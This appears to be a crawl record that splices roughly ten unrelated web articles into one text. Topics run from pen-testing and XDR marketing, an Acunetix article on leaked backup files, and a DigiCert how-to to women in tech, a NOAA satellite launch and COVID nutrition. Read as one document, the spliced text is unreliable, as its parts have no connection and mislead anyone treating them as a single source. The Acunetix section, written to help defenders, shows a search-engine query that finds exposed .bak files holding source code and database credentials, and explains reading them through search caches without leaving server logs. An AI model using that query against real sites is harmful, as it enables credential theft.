Using Core Impact’s phishing capabilities, Annie could harvest email addresses that are visible from the Internet as well as the organizational intranet. Phish can then be designed to appear as authentic as needed. If opened, these phishing simulations can launch network pen tests to show how much access could be attained once deployed, demonstrating just how dangerous a phishing attack can be. At the conclusion of each test, Core Impact generates a list of who opened these emails, providing insight into who is most susceptible to these types of attacks.
From there, this data can be used to design and implement effective instruction and training, teaching employees vigilance and techniques for recognizing and reporting phishing attacks. Additionally, running phishing simulations before and after training, or making it a regular practice in general, can provide valuable data about how successful these education efforts are.
Use Case: Advanced Threats
With more incidences of severe attacks on the news, Acme’s concern of stealthy attacks grows. Could a seemingly minor threat vector serve as an entry point for an attacker to linger within the environment for a long period of time, allowing them to slowly work their way into more critical areas of the IT infrastructure to steal valuable data or severely disrupt operations?
Most cyber-attacks take a “hit-and-run” approach, using methods like DDoS or malware to achieve a simple goal of a single step breach. However, there are an increasing number of complex advanced threats that target high value objectives.
Such attacks are multi-layered, with attackers remaining in the environment long after the initial exploitation. Once they’ve gained an initial foothold, they’ll work on strengthening it to get closer to their ultimate goal. For example, while they may use a successful phishing attack as their entry point, the end goal of the attack is not to remain on the initial victim’s device. Instead, they’ll begin to determine if additional users have access to the machine, what networks it can talk to, and where the local DNS servers or even domain controllers are. From there, they’ll pivot, using another attack to gain access to other systems.
Since such attacks take more time and skill in order to gain additional access to a hard-to-reach target, they need to remain undetected and linger in the system. Consequently, attackers focus on “low and slow” attacks, which involve stealthily moving from one compromised host to the next, without generating irregular or unpredictable network traffic in order to hunt for their specific data or system objectives.
Unfortunately, many security teams are focused solely on initial exploitation, as their resources don’t enable them to explore potential next steps of an attack.
Acme’s security team could use a penetration testing solution like Core Impact to run advanced penetration tests. In addition to information gathering and entry point attacks, such tools can also run tests to escalate privileges after a successful breach, allowing them to advance further into an IT environment.
Additionally, just as cyber-attackers use multiple tools, so must penetration testers. A security team could benefit from an adversary simulation solution to further play out an advanced persistent threat (APT) scenario. Solutions like Cobalt Strike can emulate a threat actor focused on stealth and post-exploitation so that cybersecurity professionals can determine whether an infrastructure’s defenses are strong enough to detect or prevent an advanced adversary from moving closer to critical assets. In fact, Core Impact and Cobalt Strike even have interoperability features, like session passing, which allows an attack simulation to be played out from initial breach to an embedded actor.
Use Case: IoT and SCADA Testing
Acme’s IT infrastructure does not just consist of servers and workstations. As a large manufacturing company, they have a SCADA system, as well as IoT devices, like the office’s smart thermostat. Additionally, Acme permits remote work, so IoT devices in the homes of employees may also be connected to the network.
Many IoT devices have become critical to organizational productivity. Unfortunately, these added benefits are accompanied by security risks. IoT devices not only increase the attack surface, they further increase risk because they often lack traditional preventative layers like antivirus.
The danger of IoT devices is two-fold. First, threat actors may have a substantially easier time breaching the network using IoT devices as their entry points. While the IoT device may not provide significant access to sensitive information, it can be used as the initial link in an attack chain that will eventually lead them deeper into the network. For example, one large data breach began when a threat actor attained credentials to a HVAC system in a company’s building.
Second, certain IoT devices and SCADA systems are essential to the primary function of an organization, so taking control of these devices or simply disabling them can completely cripple the business. This can even affect the functionality of cities or countries. For example, nuclear centrifuges were targeted by the Stuxnet worm.
Uncovering any potential vulnerabilities in these devices through pen testing is a key way to ensure they are as secure as possible. Pen testers can use exploits that take advantage of flaws or weaknesses in an IoT device, demonstrating how a threat actor could gain access. Even efforts to make IoT more secure should be tested. Some organizations have attempted to connect IoT devices using a VPN as an added safeguard. However, threat actors can also target weaknesses in VPNs, such as those that have gone unpatched, so these should also be regularly assessed.
Core Impact has a robust, stable library of expert tested commercial-grade exploits, which is regularly updated. A partnership with ExCraft Labs, an expert cybersecurity research group, provides the option to add additional IoT exploit packs, allowing pen testers to comprehensively assess every piece of an IT infrastructure.
Ultimately, these use cases show the dynamic ways pen testing tools can give organizations a security advantage, providing valuable insights that will help mitigate risk and protect essential assets. These use cases also provide a glimpse of the benefits of Core Impact, a robust, automated tool that provides both visibility into the security stance of your organization and a clear pathway towards remediation. With Core Impact, security teams can maximize their resources with a centralized solution that allows you to gather information, exploit systems using certified exploits, and generate reports, all in one place.
Ready to Start Pen Testing?
Core Impact is simple enough for your first test, powerful enough for the rest. See if Core Impact is the right fit for your organization with a free trial. | <urn:uuid:a8f50116-649b-4fe8-96ac-a7ea2415dd03> | CC-MAIN-2022-40 | https://www.coresecurity.com/resources/guides/how-assess-your-security-pen-testing-use-case-guide | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335350.36/warc/CC-MAIN-20220929100506-20220929130506-00541.warc.gz | en | 0.945321 | 4,171 | 2.578125 | 3 |
If you are new to continuity, risk, and/or resilience, you’ve come to the right place. These topics can seem overwhelming at first, but if you break them down into smaller components, they are much easier to absorb. Let’s start from the beginning.
What are business continuity, risk management, and operational resilience?
Business Continuity is the ongoing effort to understand, measure, and mitigate the risk/impact business disruptions have on an organization. The description and measurement of impact is often achieved through assessments (such as a business impact analysis).
Risk Management can be broken down into three areas:
- Operational Risk Management: The methods and practices used by organizations to manage the risk of potential loss related to internal processes, people, and systems, or from external events.
- Enterprise Risk Management: The methods and practices used by organizations to manage emerging or existing risks and capture potential opportunities related to the achievement of their strategic or enterprise-level objectives.
- Third-Party Risk Management: The process of identifying and managing risks associated with outsourcing to third-party vendors or service providers. This could include access to your organization’s data, operations, finances, customer information, or other sensitive data.
Operational Resilience is the ability for an organization to sustain and continue delivering critical products or services to its customers or clients in the face of operational disruption. This is achieved through anticipating, preventing, adapting/responding, recovering, and continually learning from these disruptions.
What does this look like for many organizations?
It’s different for every organization, but the ultimate goal is always to keep operations going and protect the business, which can be anything from cyber threats and financial losses to reputational risks. Generally, an organization’s continuity, risk, and resilience efforts and initiatives – or program – can be categorized as one of the following:
- None: no defined methodology or solution
- Intermediate: some methodology and structure
- Mature: defined methodology but without departmental integration, possibly using minimal technology
- Advanced: defined methodology and integrated approach, leveraging technology
A big key to success is avoiding unintegrated approaches.
Many times, business continuity, risk management, and operational resilience initiatives operate in different capacities within an organization. They can also be described in other ways or have even multiple departments, subsets, and teams such as crisis and/or incident management, enterprise or organization resilience, IT risk assessment, etc.
Even if the disciplines are managed by the same operating group, the activities are often performed as separate work streams. An unintegrated approach to these practices traditionally negatively impacts an organization’s resiliency and decreases program efficiency and effectiveness.
Integrating these business processes increases an organization’s resiliency and ability to respond to business disruptions while increasing program efficiency and effectiveness. This collaboration also helps promote a culture of resiliency throughout the organization, which really just means that as a whole, the organization understands the importance of resilience, and it touches every employee in some way.
Even with an integrated program, there are so many risks out there.
Some of these dangers and challenges include tornadoes, pandemics, supply chain failure, ransomware, stealing, equipment breakdown, etc. The list can go on forever, so how do you manage all of this? All risks, as we know in the world today, can be categorized into four different types of impacts, which is also known as the all hazards approach. These are:
Data provides a large benefit when managing and mitigating all of these risk categories.
As it’s important to integrate programs, it’s also important to integrate information. Basically, you need to understand how your organization works to protect it from breaking (from the risk impact types above).
Resilience must always be an ongoing initiative, which is why data is so key for long-term resilience, and ultimately, protecting your organization. You can use data and information to pivot as needed, making this approach much more effective than writing a book full of plans that becomes outdated almost immediately. Written plans don’t provide the agility needed in an ever-changing world − real-time data and technology do.
Start with the basics and go!
In short, start with educating and understanding, then build from there! Sooner rather than later is always better because like we’ve learned recently with the pandemic, you never really know what is going to happen.
New to all of this stuff and unsure where to start? Get more back to the basics of continuity, risk, and resilience information!
For more basics of continuity, risk, and resilience information, check out our podcast Building a More Resilient World that further discusses these topics, from getting started and understanding your organization to protecting your people.
Want to see technology in action? We are here to help! Discover what’s possible with Fusion and request a demo. | <urn:uuid:b5f291c3-63a8-4996-bc1d-f527a7ea739b> | CC-MAIN-2022-40 | https://www.fusionrm.com/blogs/back-to-the-basics-of-continuity-risk-and-resilience/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335350.36/warc/CC-MAIN-20220929100506-20220929130506-00541.warc.gz | en | 0.947714 | 1,030 | 2.609375 | 3 |
If you’re like most business owners, you’re always looking for new and innovative ways to keep your data safe. You may have heard of XDR – Extended Detection & Response Security, and you’re wondering what it is and whether or not it’s the right solution for you. This blog post will discuss what XDR is, how it works, and why it’s such an important security measure for businesses today. We’ll also discuss EDR & MDR so that you can make an informed decision when you’re thinking about one. So read on to learn all about XDR
What Is XDR?
XDR is a security term that stands for Extended Detection & Response. It’s an approach to cybersecurity that allows organizations to detect and respond to threats across the entire attack continuum, from initial compromise to full data breach. XDR builds upon the concepts of EDR (Endpoint Detection and Response) by adding detection and response capabilities for additional data types and systems beyond just endpoint data. This makes XDR a more comprehensive solution that can provide better visibility into and protection against security threats.
How Does XDR Work?
XDR is a next-generation endpoint security solution that uses machine learning and behavioral analytics to detect and respond to threats in real-time. It can protect your organization from ransomware, malware, and other advanced threats. XDR’s machine learning algorithm is constantly learning and improving, so it can identify new threats as they emerge. And its behavioral analytics engine monitors all activity on your network, looking for any suspicious or aberrant behavior that could indicate a threat.
When XDR detects a threat, it automatically responds with the appropriate action, such as quarantining the file or blocking the IP address. And because XDR is cloud-based, updates and new definitions are automatically deployed across all of your devices. There are four key components of XDR: data collection, data analysis, threat detection, and response.
The goal of data collection is to collect information from a variety of security tools and strategies. The XDR platform uses this data to analyze it.
Data analysis is the process of reviewing the collected data to look for patterns and indicators of compromise. This step is crucial for identifying threats that may have otherwise gone undetected.
Threat detection involves identifying actual threats from the data that has been collected and analyzed. This is typically done using a combination of machine learning and human expertise.
Response is the final stage, and it entails taking action to mitigate or neutralize the threat. This may involve anything from blocking malicious traffic to isolating infected systems.
What Are the Benefits of XDR?
1. Improved Prevention Capabilities
Extended detection and response (XDR) is a security solution that provides better visibility and protection against threats. It builds upon the traditional SIEM model by adding new capabilities such as file analysis, behavioral analytics, and machine learning. These features help to improve the accuracy of detections and provide faster incident response.
2. More Granular Visibility
XDR provides more granular visibility into the activities of users and devices on the network. By collecting data from multiple sources, it is able to provide a comprehensive view of activity across the enterprise. This includes both malicious and benign activity, which helps security teams to better understand what is happening on their networks.
3. Operation-Centric Approach to Security
XDR takes an operation-centric approach to security. This means that it focuses on the actions of users and devices rather than the data they generate. By understanding the context of the user and device activity, it is able to provide better visibility into potential threats. Additionally, this approach helps to reduce false positives and improve incident response times.
4. Instantaneous Detection and Response
XDR provides instantaneous detection and response to threats. This is possible because of real-time analysis of data from multiple sources. Additionally, it uses machine learning to continually improve its threat detection capabilities. As a result, security teams can quickly and effectively respond to incidents.
5. Operational Proficiency
XDR gives a more proactive and preventive approach to security. By using machine learning and behavioral analytics, it is able to detect threats earlier in the attack lifecycle. Additionally, it provides a closed-loop feedback loop that helps to continuously improve the efficacy of security operations. It’s also more efficient than traditional security solutions. This is because it automates many of the manual tasks that are required for detection and response. Finally, XDR provides a centralized platform for managing security operations. This helps to reduce the overhead associated with managing multiple security products.
XDR vs. EDR & MDR: What’s the Difference?
There is a lot of confusion when it comes to XDR vs. EDR & MDR in data security. To understand the difference, you first need to understand what each one stands for.
XDR stands for Extended Detection and Response. This type of data security monitoring detects, analyzes, and responds to threats that have already infiltrated your system. It’s designed to provide a more holistic view of your system so you can see not only where the threat originated but also how it’s spread throughout your network. EDR, on the other hand, is Endpoint Detection and Response.
This type of data security monitors individual endpoint devices for signs of malicious activity. If a threat is detected, EDR can help you track down the source and contain the damage. MDR, finally, means Managed Detection and Response. This is a type of data security service that combines the best of both XDR and EDR.
What Is the Best Option for You?
It really depends on the specific needs of your organization. If you’re looking for a more comprehensive view of your system and how threats are spreading, then XDR may be the best solution for you. If you’re primarily concerned with endpoint devices, then EDR may be a better fit. And if you want a combination of both, then MDR may be the right choice. The important thing is to assess your needs and choose the solution that will best protect your data. Whichever one you choose, make sure it’s from a reputable provider so you can be confident in its ability to keep your system safe.
Contact Cyber Sainik for All Your Data Security Needs!
At Cyber Sainik, we offer all three types of data security solutions: XDR, EDR, and MDR. We can help you assess your needs and choose the right option for your organization. Contact us today to learn more about our data security services. | <urn:uuid:08fb891d-5109-44a8-883d-d333bddcdcdf> | CC-MAIN-2022-40 | https://cybersainik.com/a-complete-guide-of-xdr-extended-detection-response-security/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00541.warc.gz | en | 0.924723 | 1,375 | 2.609375 | 3 |
Changing the Friendly Name of an SSL Certificate
SSL Certificates are not required to have friendly names and are not part of the SSL Certificate. However, in environments that require multiple SSL Certificates, the lack of friendly names or poorly used friendly names can make managing your SSL Certificate more difficult.
If you are using multiple SSL Certificates in your environment, good friendly names can help you easily identify each certificate at a glance. You can use friendly names to remind you when a certificate expires, to provide information about who issued the certificate, and to distinguish multiple certificates with the same domain name.
On IIS and Exchange servers, when assigning your SSL Certificates to a website or a domain, friendly names are extremely helpful because certificates are displayed by their friendly names.
How to Edit an SSL Certificate's Friendly Name with the DigiCert Utility
On the Windows server where your SSL Certificates are located, download and save the DigiCert® Certificate Utility for Windows executable (DigiCertUtil.exe).
Run the DigiCert® Certificate Utility for Windows (double-click DigiCertUtil).
In the DigiCert Certificate Utility for Windows©, click SSL (gold lock), right-click on the SSL Certificate whose friendly name you want to change, and then click Edit friendly name.
In the Friendly Name box, enter a unique friendly name for the certificate to help you distinguish this certificate from the other certificates on your server.
Example Naming Conventions:
Domain Name: yourDomain-digicert-(expiration.date) Company Name: yourCompany-digicert-(expiration.date) Certificate Type: wildcard-digicert-(expiration.date)
Note: If you are using a Wildcard certificate with multiple websites, you may want to begin your friendly name with a wildcard character * (e.g. *your.domain-digicert-(expiration.date)). This naming convention makes it easier to identify the wildcard certificate so that you can assign it to multiple websites.
When you are finished, click Save. | <urn:uuid:4e18435a-936f-4b8b-a8a4-cd08ca124d45> | CC-MAIN-2022-40 | https://www.digicert.com/kb/util/utility-edit-friendly-name.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00541.warc.gz | en | 0.846337 | 441 | 2.75 | 3 |
Astronauts must be some of the bravest people on (or off) the planet. Every day they perform their jobs, they face extreme risk in the most hostile environment imaginable: outer space. If you’ve ever seen the movie “Gravity,” you’ll know how harsh survival can be outside of Earth. Watch how NASA prepares trainee astronauts for space disasters using VR and robotics. It’s out of this world! | <urn:uuid:1717c276-fab2-41b9-8b50-91a135e06b24> | CC-MAIN-2022-40 | https://www.komando.com/video/komando-picks/how-astronauts-train-for-a-worst-case-spacewalk/681945/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00541.warc.gz | en | 0.888619 | 94 | 2.75 | 3 |
Did you know that in 1984, 37 percent of computer science degrees were held by women? Today, that figure is just 19 percent. Even when women do choose STEM careers, only 26 percent work in technical roles, compared to 40 percent of men. And in technology specifically, the women who enter the industry leave at a rate 45 percent higher than their male peers.
Why? Indeed.com reached out to 1,000 women and asked them to explain.
“Lack of career growth or trajectory is a major factor driving women to leave their jobs — this was the most common response (28 percent) when we asked why they left their last job,” writes Kim Williams, senior director of design at Indeed, in a summary of Indeed’s research.
“The second most-common reason for leaving was poor management, with a quarter of respondents choosing this reason. Slow salary growth came in as the third most-common reason (24 percent) respondents left their last job. By contrast, issues related to lifestyle, such as work-life balance (14 percent), culture fit (12 percent) and inadequate parental leave policies (2 percent) were less common reasons for leaving a job,” Williams says.
Much of these issues are framed in a benign way, at least it seems that way to me. Dig a little deeper, though, and the underlying sexism becomes clearer.
As Williams writes, “Meanwhile, many women in tech believe that men have more career growth opportunities — only half (53 percent) think they have the same opportunities to enter senior leadership roles as their male counterparts. And among women who have children or other family responsibilities, almost a third (28 percent) believe they’ve been passed up for a promotion because they are a parent or have another family responsibility.”
I don’t believe for a second that any man would be passed over for a promotion because he’s a dad or because he has additional family responsibilities.
Almost half of respondents (46 percent) believe they’re paid less than men, and 53 percent don’t believe they can ask for either a promotion or a raise.
What can companies do to address these concerns? In addition to removing unconscious bias from the hiring process and bringing more women on board, survey respondents say greater salary transparency could help, as would working toward gender pay equity across the board and empowering women to ask for deserved raises and promotion.
Good news for younger generation of women
The good news is that the youngest generation of women currently in the workforce seem well-positioned to actually do something about this – they’ll leave a job that’s not giving them opportunities or where they face discrimination without a second thought.
“More than any other age group, women age 25-34 cite the inability to break into management or leadership roles (27 percent) and bias or discrimination (25 percent) to be the biggest challenges they have faced in their careers. However, this age group is also more likely than women as a whole to leave a job because the team wasn’t diverse enough (27 percent, compared to 23 percent for all women) or there wasn’t enough female leadership representation (24 percent compared to 20 percent for all women),” the Indeed study found.
I hope the next generation of women in tech will continue to fight for equality and equity for all. | <urn:uuid:0354d5fb-a7ae-4870-ad78-240ffc7f5220> | CC-MAIN-2022-40 | https://www.cio.com/article/222541/why-women-leave-tech.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00541.warc.gz | en | 0.971806 | 697 | 2.734375 | 3 |
The very real threat of information disclosure by means of inadvertent exposure of sensitive files has been a constant source of woe for corporations and individuals alike. Despite having the potential for serious repercussions including legal ones, many webmasters, administrators and developers have struggled to contain this common issue for years. This article explores various manifestations of related issues, gives readers a glance at the modi operandi of real-world attackers trying to exploit them, and provides guidance on how to protect a website against file based information leakage.
One of the most common examples of backup files exposing sensitive information may be that of the backup copy of a .php file. A server administrator planning to modify a configuration file, such as wp-config.php, may choose to create a backup copy with a similar name first – in this example, wp-config.bak. Although clearly not best practice, this exact behaviour can be observed in the wild on a regular basis.
While the original configuration file’s name with the extension .php will be passed through the server’s PHP interpreter, the same can not necessarily be said about the backup copy. Unless configured otherwise, many popular web servers would simply deliver a file with the extension .bak as is, exposing the .php file’s source code, configuration options, and – in the case of an actual WordPress configuration file – database credentials.
When temporary files cause permanent damage
While it’s certainly easy to blame the exposure of such files on human error alone, many similar cases have resulted from software taking far-reaching decisions such as the creation of temporary or backup files on behalf of their users – and often without their knowledge, let alone consent. A typical example would be that of text editors quietly creating backup copies of currently edited files in the same directory with an easily guessable file name, often simply appending the tilde character (~) to the original file name. Even though most text editors tend to delete these files once deemed unnecessary, such functionality alone must not be relied upon given what’s at stake. Ultimately, the responsibility for the timely removal of sensitive files remains with the user.
Another common source of unintended information disclosure are versioning tools such as Git. Used by both novice and seasoned developers all over the world, partial and even whole Git repositories have repeatedly found their way onto publicly accessible web servers, and, as a result, into the hands of malicious actors.
While a proper and mature deployment cycle should not allow such data to reach a production system in the first place, experience has shown over and over again that a single mistake by programmers and administrators, often finding themselves working under relentless pressure, can be sufficient for entire
.git directories to slip through and expose its information to an audience far larger than anticipated.
Passive reconnaissance, active exploitation
Both malicious hackers and legitimate security researchers have been known to develop, distribute and employ tools specifically crafted with the sole purpose of locating and extracting sensitive information from forgotten or unintentionally shared files. The resulting dangers are greatly exacerbated by the relative ease with which these tools can be used to aid in the discovery of file based information disclosure.
Some of the resulting attacks do not rely on actively requesting sensitive files from the targeted web server, but will instead make use of more passive forms of reconnaissance. This includes, but is not limited to, abuse of the various little-known operators supported by freely available search engines, such as Google, Bing and Yandex. An example would be the combined use of the site: and ext: operators, as shown in the following example:
This search query
<https://www.google.com/search?q=site:testphp.vulnweb.com+ext:bak&hl=en&filter=0> will yield a list of files ending in “
.bak“, an extension commonly associated with backup files, while restricting search results to the domain of the target – in this case,
At the time of writing, the search results for this query consist of links to the copy of the site’s
index.php file, exposing its source code, followed by a copy of a common WordPress configuration file, exposing sensitive information such as database credentials:
To further expand on this example, readers will note the small triangle right next to the URIs of each search result:
Clicking on it will open a menu offering access to a “Cached” version of the file
<http://webcache.googleusercontent.com/search?q=cache:XaK4yx2VnxYJ:testphp.vulnweb.com/index.bak+&cd=1&hl=en&ct=clnk&gl=mt>, allowing for entirely passive access to its contents without leaving evidence of access in the log files of the targeted web server. This enables attackers to extract potentially sensitive information without having to connect to the server at all, leaving site administrators and breach investigators none the wiser.
Beating the bots: Why early detection matters
Search engine caching adds another layer of complexity to the remediation of such issues. Not only must these files be identified and removed from the system exposing them – often a daunting task, considering their creation may have been unintended in the first place, but they also have to be deleted from various caches, including those of search engines. In practice, exposed passwords and similarly sensitive data have to be considered as known to third parties, leading to time-intensive and costly follow-up investigations of other systems potentially affected by the leaked information.
Fortunately, Acunetix offers various checks for multiple variants of this common vulnerability class. This includes, but is certainly not limited to, the discovery of backup files, backup copies of both files and directories, temporary files, versioning and source control system data, and also more exotic causes of information disclosure such as PHP coredumps and phpMyAdmin SQL exports.
Get the latest content on web security
in your inbox each week. | <urn:uuid:94d411e4-aaa4-498a-98d3-3356d7cab364> | CC-MAIN-2022-40 | https://www.acunetix.com/blog/web-security-zone/how-to-stop-backup-leaking-sensitive-information/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00541.warc.gz | en | 0.912964 | 1,300 | 2.578125 | 3 |
Data Engineering Integration 10.2.2
- Data Engineering Integration 10.2.2
- All Products
Complex Data Type
An array is an ordered collection of elements.
The elements can be of a primitive or complex data type. All elements in the array must be of the same data type.
A map is an unordered collection of key-value pair elements.
The key must be of a primitive data type. The value can be of a primitive or complex data type.
A struct is a collection of elements of different data types.
The elements can be of primitive or complex data types. Struct has a schema that defines the structure of the data.
Updated July 10, 2020 | <urn:uuid:a74663bd-f205-4bc9-91c4-ec81469b2869> | CC-MAIN-2022-40 | https://docs.informatica.com/data-engineering/data-engineering-integration/10-2-2/user-guide/hierarchical-data-processing/complex-data-types.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00741.warc.gz | en | 0.718947 | 152 | 2.921875 | 3 |
[Table of Contents]
What is cybersecurity?
Why is cybersecurity important?
How does cybersecurity affect me?
Cybersecurity 101 – Topics
How to protect yourself online & offline
[Quick Glossary / Definitions]*
|Cybersecurity: “measures taken to protect a computer or computer system (as on the Internet) against unauthorized access or attack”
Phishing: “a scam by which an Internet user is duped (as by a deceptive e-mail message) into revealing personal or confidential information which the scammer can use illicitly”
Denial-of-service attack (DDoS): “a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet”
Social Engineering: “the psychological manipulation of people, causing them to perform actions or divulge confidential information to malicious perpetrators”
Open-source intelligence (OSINT): “data collected from publicly available sources to be used in an intelligence context, such as an investigation or analysis of a particular subject”
With the rapid growth of computer technology throughout the past few decades, many people have started to worry about the online security and safety of the internet as a whole. In particular, users generally find it difficult to keep track of their digital footprint at all times, and people often don’t realize and aren’t always aware of the potential dangers of the internet.
Cybersecurity is a field of computer science focused on protecting computers, users, and the internet from potential security dangers that could pose as a threat to user data and system integrity when taken advantage of by malicious actors online. Cybersecurity is a rapidly growing field, both in importance and the number of jobs, and continues to be a crucial field for the foreseeable future of the internet and the digital era.
Why is Cybersecurity Important?
In 2019, according to the International Telecommunications Union (ITU), roughly half of the world population of 7.75 billion people used the internet.
That’s right — an estimated figure of 4.1 billion people were actively using the internet in their daily lives, whether it be catching up on their favorite movies and TV shows, working for their jobs, engaging in conversations with strangers online, playing their favorite video games & chatting with friends, performing academic research and affairs, or anything else on the internet.
Humans have adapted to a lifestyle extremely involved in online affairs, and there’s no doubt that there are hackers and malicious actors searching for easy prey in the online sea of internet users.
Cybersecurity workers aim to protect the internet from hackers and malicious actors by constantly researching & searching for vulnerabilities in computer systems and software applications, as well as informing software developers and end users about these important security related vulnerabilities, before they get into the hands of malicious actors.
As an end user, the effects of cybersecurity vulnerabilities and attacks can be felt both directly and indirectly.
Phishing attempts and scams are very prominent online, and can easily deceive individuals who may not realize or are aware of such scams and baits. Password and account security also commonly affect end users, leading to problems like identity fraud, bank theft, and other kinds of dangers.
Cybersecurity has the potential to warn end users about these types of situations, and can preemptively stop these types of attacks before they even reach the end user. While these are just a few examples of direct effects of cybersecurity, there are lots of indirect effects as well — for instance, password breaches and company infrastructure problems aren’t necessarily the user’s fault, but can affect the user’s personal information and online presence indirectly.
Cybersecurity aims to prevent these types of problems at an infrastructural and business level, rather than at the user level.
Next, we’ll be taking a look at various cybersecurity related subtopics, and we’ll be explaining why they’re important in relation to end users and the computer systems as a whole.
INTERNET / CLOUD / NETWORK SECURITY
The internet & cloud services are by far the most commonly utilized services online. Password leaks and account takeovers are a daily occurrence, causing tremendous damage to users in forms such as identity theft, bank fraud, and even social media damage. The cloud is no different — attackers can gain access to your personal files and information if they ever gain access to your account, along with your emails and other personal details stored online. Network security breaches don’t affect end users directly, but can cause business and small companies large amounts of damage, including but not limited to database leaks, corporate secret swindling, among other business related issues that could indirectly affect end users like you.
IOT & HOUSEHOLD SECURITY
As households slowly work towards new technologies and innovations, more and more home appliances have started to rely on internal networks (hence the term “Internet of Things”, or IoT), leading to many more vulnerabilities and attack vectors that can help attackers gain access to household appliances, such as home security systems, smart locks, security cameras, smart thermostats, and even printers.
SPAM, SOCIAL ENGINEERING & PHISHING
The introduction of online messaging boards, forums, and social media platforms into the modern internet has consequently brought in large amounts of hate speech, spam, and troll messages into the internet. Looking beyond these harmless messages, more and more instances of social engineering ploys and user phishing have also circulated throughout the world wide web, allowing attackers to target the less aware and vulnerable people of society, resulting in terrible cases of identity theft, money fraud, and general havoc on their profiles online.
In this article, we discussed the basics of cybersecurity, explored many various cybersecurity related subtopics, and looked at how cybersecurity affects us, and what we can do to protect ourselves from different types of cybersecurity threats. I hope you’ve learned something new about cybersecurity after reading this article, and remember to stay safe online!
Infographic provided by intelligence.businessinsider.com | <urn:uuid:8e3a02c0-c2cc-4f3a-a397-59bbff81d284> | CC-MAIN-2022-40 | https://hailbytes.com/cybersecurity-101-what-you-need-to-know-in-2022/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00741.warc.gz | en | 0.932447 | 1,271 | 3.4375 | 3 |
The National Oceanic and Atmospheric Administration (NOAA) is preparing to launch a geostationary satellite that can scan the earth from North Pole to South Pole in five minutes.
The Geostationary Operational Environmental Satellite-R (GOES-R) will provide weather reports to meteorologists, enabling them to observe weather patterns in the Western Hemisphere develop in near-real time. GOES-R is the first in a series of four satellites that will provide weather forecasts; it will launch at 5:40 p.m. on Nov. 4.
“GOES-R is a quantum leap above and beyond its NOAA predecessors,” said Stephen Volz, assistant administrator for NOAA’s Satellite and Information Service, at a press conference on Oct. 4. “U.S. forecasting supports the world.”
The four satellites will sustain coverage through 2036, according to Greg Mandt, NOAA’s GOES-R program manager. Mandt said that these satellites are the most sophisticated ones NOAA has ever launched and contain technological abilities previous systems lacked. For example, GOES-R is equipped with an Advanced Baseline Imager (ABI), which can take pictures revealing area imagery and radiometric information about Earth’s oceans, weather, and environment. Mandt said the ABI functions five times faster than previous satellites at a resolution four times clearer.
GOES-R is also furnished with a Geostationary Lightning Mapper (GLM), which will measure lightning activity within clouds, between clouds, and on the ground throughout the Americas. In addition to rain and winds, GOES-R will be able to measure other natural occurrences, such as volcanic ash. Mandt used the example of a volcano that erupted a few days ago in Mexico as one of the phenomena on which GOES-R will be able to collect data.
The satellite will be able to update scientists with information every five minutes. Scientists can also use the satellite to conduct detailed studies on specific events.
“We’re really excited to receive data,” said Louis Uccellini, Director of the National Weather Service (NWS). “We’re ready for this data as it flows.” | <urn:uuid:c3e464de-afed-483d-9156-fe7737290ae6> | CC-MAIN-2022-40 | https://origin.meritalk.com/articles/noaa-expects-big-data-from-most-advanced-satellite-to-date/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00741.warc.gz | en | 0.915298 | 463 | 2.671875 | 3 |
COVID-19 suppresses the immune system by causing a systemic inflammatory response, also known as cytokine release syndrome, leaving COVID-19 patients with high levels of proinflammatory cytokines and chemokines.
Nutrition’s function in the respiratory and immune systems has been investigated in much research, and its significance cannot be overstated, as the nutritional status of patients has been shown to be directly connected with the severity of the disease. Key dietary components such as vitamin C, D, omega-3 fatty acids, and zinc have shown potential in their anti-inflammatory effects, as well as the famous Mediterranean diet.
The study found that the use of anti-inflammatory dietary approaches does to a certain degree prevent Sars-CoV-2 infections and even lessen COVID-19 effects.
The study findings were published in the peer reviewed journal: Diseases.
Severe acute respiratory syndrome coronavirus-2 (SARS-CoV-2), also known as COVID-19, is a contagious disease that started its spread in Wuhan, China, in 2019 . The World Health Organisation (WHO) has classified the rapidly evolving disease as a global pandemic .
Since then, it has caused unprecedented strain on healthcare systems, with overwhelming mortalities and severities globally. The disease presents itself in a vast range of symptoms, most noticeably with coughs, fevers, fatigue, and shortness of breaths, or in critical cases with severe complications such as respiratory failure or multiple organ dysfunction syndromes, often resulting in death .
Evidence suggests that the morbidity of COVID-19 is associated with increased levels of inflammatory mediators such as cytokines and chemokines, with interferon-γ, interleukin-1, interleukin-6, TNF, and interleukin-18 considered as key cytokines that possess central immunopathologic functions [4,5].
These complications are largely associated with the onset of aggressive inflammatory responses that trigger the release of proinflammatory cytokines, propelled by a series of complex, interconnected networks of signalling pathways and cell types . This series of reactions is known as a “cytokine storm”.
The severity of COVID-19 symptoms, as well as previously similar coronavirus SARS and MERS, is associated with this hyperactive immune response, with increased levels of cytokines and chemokines . In COVID-19, a delayed release of cytokines and chemokines followed by the rapid release of proinflammatory cytokines led to t-cell apoptosis and delayed viral clearance .
The surge of cytokines as the disease progresses causes lung injury as neutrophils and monocytes infiltrate and destroy the alveolar cellular barriers . The coronavirus has also exhibited thromboembolic effects in patients, especially in those with high blood pressure, causing damage to blood vessels .
Though the availability of COVID-19 vaccines has demonstrated efficiency in reducing COVID-19-associated mortalities and morbidities, the long-term effectiveness is still under clinical trial [11,12].
